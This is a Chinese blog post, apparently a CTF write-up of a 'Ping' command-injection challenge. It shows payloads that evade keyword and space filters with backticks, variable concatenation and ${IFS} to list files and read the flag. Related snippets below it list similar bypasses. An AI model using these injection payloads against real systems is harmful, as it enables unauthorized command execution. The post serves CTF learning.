中学生CTF 平台Ping Write Up

最新推荐文章于 2024-07-25 14:14:33 发布

「已注销」

最新推荐文章于 2024-07-25 14:14:33 发布

阅读量3.2k

点赞数

分类专栏： CTF

本文链接：https://blog.csdn.net/qq_26187985/article/details/89046386

版权

CTF 专栏收录该内容

10 篇文章 1 订阅

订阅专栏

地址：http://198.13.45.199:5005/

明显是一道命令执行的题目。

来说一下被ban的内容都有啥。

ls、cat、flag、php、>、| 以及数字点和空格

通过反引号包裹whoami后成功执行。

此时需要通过a="l";b="s";c=$a$b;$c来执行ls命令。

同时还需要包含在反引号内

127.0.0.1;`a="l";b="s";c=$a$b;$c`

flag文件近在咫尺。

flag_ae8e4cd6ce3b5

直接访问之后被403拒绝，只能通过cat读取了。

127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

因为flag和cat不能出现所以我们进行了一个拼接，而${IFS}是对空格进行一个取代作用。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

中学生CTF平台 Easy RCE write up

Ju0se

04-05

2948

题目地址：http://ctf.klmyssn.com/challenges#Easy RCE http://198.13.45.199:5006/ 查看一下源代码果断向name传值。报错，发现eval函数。然后来看一下题目的hint。哦~果然如我所想的。后面被拼接了三个！，就是为了阻止你正常的执行。破解方法很简单。加入//进行注释。成功执行...

CTF-Write-UP

03-09

UMCTF竞赛Noob的Hackathon公开组其他-UMCTF2021-Macow 写信作者： Louis Lou 标志： MOCSCTF {1_4m_l1v1n6_1n_534c_p41_v4n_p4rk_n0...首先解压缩文件，然后利用IDE编辑器搜索“ CTF”，另一部分通过搜索“}”找到。

参与评论您还未登录，请先登录后发表或查看评论

CTF-Write-up:CTF撰写和信息

03-21

CTF-Write-up:CTF撰写和信息

CTF-Web习题：[GXYCTF2019]Ping Ping Ping

最新发布

LJW123487的博客

07-25

648

本题涉及知识点：命令执行漏洞，过滤绕过

中学生CTFCodeInject WP

shenzhang7331的博客

07-15

758

网址：http://198.13.45.199:5007/ 代码审计利用的是creat_function代码注入，我们可以通过传code参数来闭合create_function的括号，执行任意代码。从题目中我们可以看到code是位于creat_function的第二的参数上，参考下图故我们构造code参数如下图所示，实现命令注入如有侵权，马上删除 ...

CTF演练---ping

2301_78637299的博客

06-06

561

CTF演练---ping--->只需要输入ip，就可以获取到你想要的

CTF——ping相关

jklw4的博客

09-12

4427

Ping PING （Packet Internet Groper），因特网包探索器，用于测试网络连接量的程序 [1] 。 Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令，主要是向特定的目的主机发送 ICMP（Internet Control Message Protocol 因特网报文控制协议）Echo 请求报文，测试目的站是否可达及了解其有关状态 [2] 。检测是否可以注入 127.0.0.1;whoami 如果存在注入，得到的结果是“www-data” ping 题目

[GXYCTF2019]Ping Ping Ping

weixin_43868349的博客

03-12

175

[GXYCTF2019]Ping Ping Ping 打开题目就是这么一个界面，/?ip=后边应该就是我们需要执行的命令，先尝试着ping一下；发现会有回显，在后面跟上命令看看；（命令执行的方法大概是加上管道符或者分号）输入ls可以查看到有flag.php ...

2019 CTF题目下载及write up（难度较大）-b64_c3VuJTIwYm95-it720.docx

11-29

- 官方和社区网站如Anquanke、XunZhiyun等提供了很多公开的Write-up（解题报告），是学习和准备CTF比赛的重要资源。总的来说，CTF比赛不仅考验参赛者的安全技能，还锻炼了他们在实际环境中应用这些技能的能力。...

CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up

08-26

CTF-第二届“陇剑杯”网络安全大赛线上赛部分write up 本篇文章将围绕第二届“陇剑杯”网络安全大赛线上赛的 Write-up 进行详细的讲解，从中可以学到许多实用的网络安全知识。首先，我们来看一下第一个题目，黑客...

CTF入门笔记之ping

qq_37410729的博客

11-02

4286

1.用命令行找flag文件随便ping,然后跟ls 例如：1;ls 发现index.php文件 1；cat index.php 查看发现就是源网站。那就向上找 1;ls …/ 继续向上找直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件同样,先查看目录 payload:?ip=1;ls 发现两个文件，尝试直接打开index文件（虽然知道肯定不行） payload：?ip=1;cat index.php 果然不行

CTF关于ping命令注入问题（1）

热门推荐

欢迎来到神林的博客

03-07

1万+

题目样式对于看到ping或者ping命令却没有弄waf时就要想到命令注入。具体注入方法看到ping命令就可以利用截断来执行新的命令。首先测试所有的截断符号： ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&&’ ‘&’ ‘}’ ‘{’ '%0a’可以当作空格来用；利用截断符号配合普通命令简单问题基本就出来；例如：ip=127.0.0.1...

ctf-ping命令执行

qq_45414878的博客

11-08

9863

[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势，启动环境，连接并输入参数，查看当前目录下都有什么 ls命令没有被过滤，并且知道flag就在这个目录下面，用cat查看的flag的时候发现空格被禁用，绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c

BUUCTF-Ping Ping Ping

m0_47571887的博客

11-07

117

打开题目，emm我们试试用get方式提交一下用url/?id=127.0.0.1;ls 查看一波flag，url/?id=127.0.0.1;cat flag.php ？？？貌似过滤掉了，那我们看看index.php 好像是把空格过滤掉了，这里我用了很多方法进行绕过，发现只有第四种可以绕过 1、<> 2、%20(space) 3、%09(tab) 4、$IFS$9、 ${IFS}、$IFS 这里好像也把flag给过滤了，我们去看看index.p..

buuctf-ping ping ping

m0_62094846的博客

11-15

658

ping地址成功了，再看看目录直接有flag，尝试使用，但是过滤了空格绕过空格方式 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt (28条消息) Linux下绕过空格的方式总结_北陌的CSDN博客-CSDN博客_空格绕过一个个尝试发现t$IFS$9有用但是又过滤了flag，那没有办法再绕过了，只能试试index.php 可...

CTF 解题云演 ping

weixin_53488451的博客

01-08

480

输入http://88f9c597.clsadp.com/?ip=127.0.0.1%0acat%20fL4g_1s_He4r_______4.查看其文件得出flag。3.尝试查看，发现文件名。2.检查主机是否在线。

ctf中ping命令执行绕过

m0_75178803的博客

10-10

1059

BUUCTF之Ping Ping Ping

金帛的博客

02-20

6959

BUUCTFWP，关于一些waf的绕过

[GXYCTF 2019]Ping Ping Ping

m0_73612768的博客

12-26

1101

ping 命令执行。本题三种解法，反引号，赋值，base64 加密。